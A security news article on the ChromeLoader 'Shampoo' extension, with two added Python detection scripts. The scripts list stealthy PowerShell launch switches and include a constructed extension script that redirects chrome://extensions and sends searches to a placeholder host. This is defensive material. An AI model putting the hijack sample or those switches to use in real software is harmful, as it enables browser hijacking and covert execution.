A new campaign distributing a new version of the ChromeLoader malicious extension has been underway since March 2023, researchers have found. The variant, called Shampoo, targets visitors to warez and pirated-movie sites. While older versions of ChromeLoader used a complex infection chain built around malicious ISO files, the latest version relies on malicious VBScript files.

Infection chain

According to HP Wolf Security, the Shampoo ChromeLoader extension is distributed as malicious VBScript files posing as free movies, video games, or other content hosted on illegal websites.
  • The VBScript launches a PowerShell script that carries out the rest of the infection chain and establishes persistence on the host.
  • Once the Shampoo extension is loaded into a Chrome session, it begins sending sensitive information to a C2 server controlled by the threat actors.
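The VBScript-to-PowerShell hand-off described above is the one step of this chain that is visible in ordinary process-creation telemetry regardless of which payload follows. The script below, an added example and not code from the page or from HP Wolf Security, walks a set of constructed Sysmon-style process events, flags any powershell.exe (or pwsh.exe) whose parent is wscript.exe or cscript.exe, raises the severity when the PowerShell command line carries hidden-window, policy-bypass or encoded-command switches, and decodes an -EncodedCommand argument (UTF-16LE base64) so an analyst can see what was run. Field names, paths and the sample command lines are assumptions made for the example.

```python
"""Flag a VBScript -> PowerShell launch chain in process-creation telemetry.

Added example, not code from the page or from HP Wolf Security. The event
records below are constructed to resemble Sysmon Event ID 1 fields; the
field names, file paths and command lines are assumptions for this example.
"""
import base64
import re

# Constructed sample events (not real telemetry).
EVENTS = [
    {"pid": 4100, "ppid": 812, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 5200, "ppid": 4100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\bob\Downloads\Free_Movie_HD.vbs"'},
    {"pid": 5320, "ppid": 5200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass "
                "-EncodedCommand SQBFAFgA"},
    # Benign PowerShell launched from Explorer, included as a negative case.
    {"pid": 6000, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Lower-cased switch fragments that make a script-host-spawned PowerShell more suspicious.
SUSPICIOUS_ARGS = ("-encodedcommand", "-enc ", "-windowstyle hidden", "-w hidden",
                   "-executionpolicy bypass", "-ep bypass", "-noprofile", "-nop ")


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Decode a PowerShell -EncodedCommand / -enc argument (base64 of UTF-16LE).

    Returns None when no encoded command is present or it does not decode.
    """
    m = re.search(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_script_host_to_powershell(events):
    """Return one hit per PowerShell process whose direct parent is wscript/cscript."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) not in POWERSHELL:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) not in SCRIPT_HOSTS:
            continue
        lowered = e["cmdline"].lower()
        flags = [a.strip() for a in SUSPICIOUS_ARGS if a in lowered]
        hits.append({
            "parent_pid": parent["pid"],
            "parent_cmdline": parent["cmdline"],
            "child_pid": e["pid"],
            "flags": flags,
            "decoded": decode_encoded_command(e["cmdline"]),
            "severity": "high" if flags else "medium",
        })
    return hits


if __name__ == "__main__":
    for hit in find_script_host_to_powershell(EVENTS):
        print(hit)
```

Running the script against the constructed events yields a single high-severity hit: the PowerShell child of the wscript.exe that opened the fake movie file, with the encoded command resolving to IEX. The rule is deliberately narrow (direct parent only) so that it can be tuned upward before being promoted to an alert.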

Capabilities of Shampoo ChromeLoader extension

The new version of the ChromeLoader extension includes many anti-debugging and anti-analysis techniques that make detection harder.
  • It can also disable search suggestions in the address bar and redirect Google, Yahoo, and Bing searches to the attackers' C2 server.
  • Shampoo keeps victims away from chrome://extensions, the page where an extension could be disabled or removed, by redirecting them to chrome://settings.
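The two behaviours listed above (rewriting search-engine navigations and bouncing chrome://extensions to chrome://settings) leave recognisable traces in an extension's permissions and background script. The following triage script is an added example, not code from the page or from HP Wolf Security: it scores an unpacked extension by its manifest permissions and by indicator patterns in its JavaScript, and is run here against two extensions constructed for the example, one that mimics the described behaviour and one benign theme. The indicator list, weights and the "suspicious" threshold are my assumptions, not published detection rules, and the C2 host in the sample is a placeholder.

```python
"""Heuristic triage of an unpacked Chrome extension for search hijacking and
chrome://extensions redirection.

Added example, not code from the page or from HP Wolf Security. The two
extensions below are constructed for the example; indicator patterns, weights
and the verdict threshold are assumptions, not published detection rules.
"""
import json
import re

SEARCH_HOSTS = ("google.com/search", "bing.com/search", "search.yahoo.com")
RISKY_PERMISSIONS = {"tabs", "webRequest", "webRequestBlocking", "webNavigation", "<all_urls>"}

# (description, regex over JavaScript source, weight)
JS_INDICATORS = [
    ("hooks tab navigation", r"chrome\.tabs\.onUpdated", 2),
    ("rewrites tab URL", r"chrome\.tabs\.update", 2),
    ("references chrome://extensions", r"chrome://extensions", 3),
    ("references chrome://settings", r"chrome://settings", 1),
    ("matches search-engine result URLs",
     "|".join(re.escape(h) for h in SEARCH_HOSTS), 3),
]
SUSPICIOUS_THRESHOLD = 6  # assumed cut-off for this example


def triage_extension(files):
    """files: mapping of relative path -> text content of an unpacked extension."""
    findings, score = [], 0
    manifest = json.loads(files.get("manifest.json", "{}"))
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    risky = sorted(perms & RISKY_PERMISSIONS)
    if risky:
        findings.append(f"risky permissions: {', '.join(risky)}")
        score += len(risky)
    for name, src in files.items():
        if not name.endswith(".js"):
            continue
        for desc, pattern, weight in JS_INDICATORS:
            if re.search(pattern, src):
                findings.append(f"{name}: {desc}")
                score += weight
    return {
        "name": manifest.get("name", "?"),
        "score": score,
        "findings": findings,
        "verdict": "suspicious" if score >= SUSPICIOUS_THRESHOLD else "benign",
    }


# Constructed extension mimicking the behaviour described in the article.
# 'example.invalid' stands in for the attackers' C2 host.
SUSPICIOUS_EXT = {
    "manifest.json": json.dumps({
        "name": "Video Helper", "manifest_version": 3, "version": "1.0",
        "permissions": ["tabs", "webNavigation", "storage"],
        "host_permissions": ["<all_urls>"],
        "background": {"service_worker": "bg.js"},
    }),
    "bg.js": r"""
chrome.tabs.onUpdated.addListener((tabId, info, tab) => {
  if (!tab.url) return;
  if (tab.url.startsWith('chrome://extensions')) {
    chrome.tabs.update(tabId, {url: 'chrome://settings'});
  } else if (['google.com/search', 'bing.com/search', 'search.yahoo.com']
             .some(h => tab.url.includes(h))) {
    chrome.tabs.update(tabId, {url: 'https://example.invalid/?q=' + encodeURIComponent(tab.url)});
  }
});
""",
}

# Constructed benign extension used as the negative case.
BENIGN_EXT = {
    "manifest.json": json.dumps({
        "name": "Dark Theme", "manifest_version": 3, "version": "2.1",
        "permissions": ["storage"],
    }),
    "content.js": "document.documentElement.classList.add('dark');\n",
}


if __name__ == "__main__":
    for ext in (SUSPICIOUS_EXT, BENIGN_EXT):
        print(json.dumps(triage_extension(ext), indent=2))
```

On a live host the same function can be pointed at each directory under the Chrome profile's Extensions folder by reading its files into the mapping; the point of the scoring is to surface extensions that both can rewrite navigations and name the specific targets the article describes, rather than to flag every extension that requests the tabs permission.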

A glance at the ChromeLoader extension

The ChromeLoader malicious extension was first spotted in early 2022 and has since featured in multiple campaigns.
  • In September 2022, ChromeLoader was used globally to steal sensitive data and to deploy decompression bombs that crash systems.
  • In November 2022, the malware was observed focusing on click fraud, forcing users to visit unwanted sites to generate pay-per-click advertising revenue.

End note

Researchers note only minor differences between Shampoo and earlier versions of ChromeLoader. Organizations should nonetheless review the IOCs published for the malware to understand its infection process and attack chain.
Publisher

Cyware